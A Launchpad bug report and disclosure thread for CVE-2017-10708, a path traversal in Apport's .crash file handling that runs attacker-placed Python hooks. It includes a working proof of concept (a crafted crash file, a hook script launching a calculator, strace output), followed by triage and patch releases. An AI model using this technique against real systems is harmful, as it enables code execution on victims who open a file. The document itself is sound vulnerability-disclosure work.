Code execution through path traversal in .crash files processing

Bug #1700573 reported by Felix Wilhelm on 2017-06-26
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Apport
High
Unassigned
apport (Ubuntu)
High
Brian Murray
Trusty
High
Unassigned
Xenial
High
Unassigned
Yakkety
High
Unassigned
Zesty
High
Unassigned
Artful
High
Brian Murray

Bug Description

The function add_hooks_info in apport/report.py is vulnerable to a directory traversal when processing the ExecutablePath key of a malicious .crash file:

        opt_path = None
        if self.get('ExecutablePath', '').startswith(_opt_dir):
            opt_path = self.get('ExecutablePath', '')
        elif package:
            # check package contents
            try:
                for f in apport.packaging.get_files(package):
                    if f.startswith(_opt_dir) and os.path.isfile(f):
                        opt_path = f
                        break
            except ValueError:
                # uninstalled package
                pass

        if opt_path:
            while len(opt_path) >= len(_opt_dir):
                hook_dirs.append(os.path.join(opt_path, 'share', 'apport', 'package-hooks'))
                opt_path = os.path.dirname(opt_path)

This can be used to execute an arbitrary python script from an attacker controlled path when a crash file is opened:

fwilhelm@box:~$ cat poc.crash
ProblemType: Bug
ExecutablePath: /opt/../tmp/poc/share/apport/package-hooks
Package: f

fwilhelm@box:~$ cat /tmp/poc/share/apport/package-hooks/f.py
import os
os.system("gnome-calculator")

fwilhelm@bpx:~$ strace -eprocess -f /usr/share/apport/apport-gtk poc.crash 2>&1 | grep gnome-calculator
[pid 62617] execve("/bin/sh", ["sh", "-c", "gnome-calculator"], [/* 65 vars */]) = 0
[pid 62617] execve("/usr/bin/gnome-calculator", ["gnome-calculator"], [/* 64 vars */]) = 0

The sub directory requirement makes this a bit tricky to exploit remotely, but depending on the environment a malicious USB drive, a shared NFS share or a crash file inside an archive could be used.

Please credit Felix Wilhelm from the Google Security Team in all releases, patches and advisories related to these issues.

CVE References

Changed in apport (Ubuntu Trusty):
status: New → Confirmed
Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Yakkety):
status: New → Confirmed
Changed in apport (Ubuntu Zesty):
status: New → Confirmed
Changed in apport (Ubuntu Artful):
status: New → Confirmed
Changed in apport (Ubuntu Trusty):
importance: Undecided → High
Changed in apport (Ubuntu Xenial):
importance: Undecided → High
Changed in apport (Ubuntu Yakkety):
importance: Undecided → High
Changed in apport (Ubuntu Zesty):
importance: Undecided → High
Changed in apport (Ubuntu Artful):
importance: Undecided → High
Tyler Hicks (tyhicks) wrote :

Hi Felix - thanks for the report! I don't immediately see how an attacker could have control of what Apport uses for ExecutablePath in the crash file. Is there more to your attack than hand crafting a .crash file and running apport-gtk on it or am I missing something here?

Subscribing bdmurray for Ubuntu apport expertise.

Tyler Hicks (tyhicks) wrote :

I had some more time to look into this. /var/crash/ is world-writable so I used the f.crash file from this bug description and moved it into that directory. Just as this bug description suggests, gnome-calculator is launched once the crash file is processed.

If the crash file is owned by my user, the gnome-calculator process runs as my user. If the crash file is owned by root, the gnome-calculator process runs as root after I authenticate as an administrative user. I still don't see a way to escalate privileges with this bug.

If the impact of this bug is that a user can craft a crash file that causes code to be run as that user, I don't feel like this is a security issue. Do you agree, Felix?

Changed in apport:
status: New → Incomplete
Changed in apport (Ubuntu Trusty):
status: Confirmed → New
Changed in apport (Ubuntu Xenial):
status: Confirmed → New
Changed in apport (Ubuntu Yakkety):
status: Confirmed → New
Changed in apport (Ubuntu Zesty):
status: Confirmed → New
Changed in apport (Ubuntu Artful):
status: Confirmed → New
Felix Wilhelm (fwilhelm01) wrote :

Hi Tyler,

thanks for looking into this. However, I disagree with your conclusion.

The attack scenario would be that an attacker tricks a victim into
opening a malicious crash file. On my Ubuntu system apport is the default handler for files ending in ".crash" so a simple click on a malicious email attachment is sufficient. Processing crash files should not lead to malicious code being executed in the same way processing a PDF or JPEG file should not lead to malicious code execution.

I think you actually fixed a very similar bug a couple of months ago and also assigned a CVE to it:
https://bugs.launchpad.net/apport/+bug/1648806

Tyler Hicks (tyhicks) wrote :

You're right, Felix. I didn't recall bug 1648806 and didn't realize that apport registered itself as a handler for .crash files. I've requested a CVE from MITRE.

@bdmurray can you prepare a fix for this bug and attach a patch? Please don't commit the fix to the public bzr tree or publicly leak any other info about this issue. Also, do you think it is necessary for Apport to register itself as a handler for .crash files? It seems to me like it provides little usefulness despite exposing users to several attacks such as this one.

Tyler Hicks (tyhicks) wrote :

This is CVE-2017-10708

Changed in apport:
status: Incomplete → Confirmed
Changed in apport (Ubuntu Trusty):
status: New → Confirmed
Changed in apport (Ubuntu Xenial):
status: New → Confirmed
Changed in apport (Ubuntu Yakkety):
status: New → Confirmed
Changed in apport (Ubuntu Zesty):
status: New → Confirmed
Changed in apport (Ubuntu Artful):
status: New → Confirmed
Brian Murray (brian-murray) wrote :

I'm on holiday next week but I am attaching a patch which I believe addresses the issue of path traversal in the _opt_dir for finding package hooks if somebody wants to run with it. Otherwise I'll finish this up the week of the 10th and add tests for it too.

Tyler Hicks (tyhicks) wrote :

Thanks for the patch, Brian. I believe that it should fix the issue reported here but would prefer to wait for you to finalize the patch before we prepare security updates. More importantly, before preparing security updates, I'd like to know if it is possible for us to remove apport as the registered .crash file handler. While the patch that you attached plugs another hole in the ship's hull, it'd be nice to plug them all at once.

Brian Murray (brian-murray) wrote :

Attached is the same patch which addresses path traversal in the ExecutablePath field of an apport report. I've also added a test for that vulnerability.

Brian Murray (brian-murray) wrote :

apport is registered as the file handler for .crash files so that one can copy a .crash file from a system which cannot submit the crash to one which can. However, I don't think that use crash is used very frequently and it is just as easy to manually submit the crash by using apport-cli so let's remove the file handler.

I tested the attached patch by rebuilding apport and installing it on an Artful system, this was enough to make .crash files open with a text editor instead of apport-gtk.

Tyler Hicks (tyhicks) wrote :

Felix, now that we've got upstream fixes, I'd like to set a coordinated release date to make this issue public and provide Ubuntu security updates. We still need to prepare and test updates on the distro side of things so I'd like to propose 2017-07-18 18:00 UTC. We'll publish Ubuntu security updates, publish an Ubuntu Security Notice, and make this bug public at that time unless we hear any objections from you. Thanks!

Felix Wilhelm (fwilhelm01) wrote :

Hi Tyler,

no objections from my side. Thanks for coordinating this.

Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.4-0ubuntu4.5

---------------
apport (2.20.4-0ubuntu4.5) zesty-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:27 -0300

Changed in apport (Ubuntu Zesty):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.3-0ubuntu8.7

---------------
apport (2.20.3-0ubuntu8.7) yakkety-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:41 -0300

Changed in apport (Ubuntu Yakkety):
status: Confirmed → Fix Released
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.14.1-0ubuntu3.25

---------------
apport (2.14.1-0ubuntu3.25) trusty-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversal in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:04 -0300

Changed in apport (Ubuntu Trusty):
status: Confirmed → Fix Released
Changed in apport:
status: Confirmed → Fix Released
importance: Undecided → High
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.1-0ubuntu2.10

---------------
apport (2.20.1-0ubuntu2.10) xenial-security; urgency=medium

  * SECURITY UPDATE: code execution through path traversial in
    .crash files (LP: #1700573)
    - apport/report.py, test/test_ui.py: fix traversal issue
      and add a test for that.
    - debian/apport.install, setup.py, xdg-mime/apport.xml: removes
      apport as a file handler for .crash files. Thanks to Brian
      Murray for the patch and Felix Wilhelm for discovering this.
    - CVE-2017-10708

 -- <email address hidden> (Leonidas S. Barbosa) Mon, 17 Jul 2017 08:43:18 -0300

Changed in apport (Ubuntu Xenial):
status: Confirmed → Fix Released
information type: Private Security → Public Security
tags: added: patch
Changed in apport (Ubuntu Artful):
status: Confirmed → In Progress
assignee: nobody → Brian Murray (brian-murray)
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package apport - 2.20.6-0ubuntu4

---------------
apport (2.20.6-0ubuntu4) artful; urgency=medium

  * apport/REThread.py: A bare except needs to be used so that we can catch
    the dialog being closed.
  * test/test_report.py: Be a little patient and give some time for the core
    file to show up.

 -- Brian Murray <email address hidden> Fri, 21 Jul 2017 10:42:33 -0700

Changed in apport (Ubuntu Artful):
status: In Progress → Fix Released
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers